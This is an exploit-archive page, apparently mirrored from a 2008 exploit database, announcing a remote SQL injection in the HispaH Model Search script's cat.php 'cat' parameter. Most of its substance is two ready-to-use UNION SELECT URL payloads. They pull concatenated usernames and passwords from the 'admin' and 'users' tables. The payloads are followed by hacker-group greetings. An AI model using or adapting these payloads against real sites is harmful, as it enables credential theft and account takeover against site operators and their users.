HispaH Model Search (cat.php cat) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HispaH Model Search (cat.php cat) Remote SQL Injection Vulnerability
# Published : 2008-05-09
# Author : InjEctOr5
# Previous Title : SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit
# Next Title : Phoenix View CMS <= Pre Alpha2 (SQL/LFI/XSS) Multiple Vulnerabilities

############### >>> Remote SQL Injection <<<  ###############
##    Cyb3r-1st                                                              Cyb3r-1st    ##
################## >>> InjEctOr5 TeaM  <<< ################

## author   :  cyb3r-1st
## contact :  t3tto0 [at] yahoo.com
                 cyb3r-1st [at] hotmail.com

## script : model-search
## download : www.hispah.com/demos/models1rock  ::> demo

## dork    : find it
## exploit : http://www.site.me/cat.php?cat=[sql injection]

## example:here u can found an sql exploit :::
## for admin inf0 :::
 www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+admin/*
## for users inf0  :::
 www.site.me/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+users/*


########### Greetz #############

>>> InjEctOr5 TeaM
>>>my best freinds ::  titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker $ anaconda-ksa $ sirus $ crazy -x  and all freinds
>>> all muslims

# www.Syue.com [2008-05-09]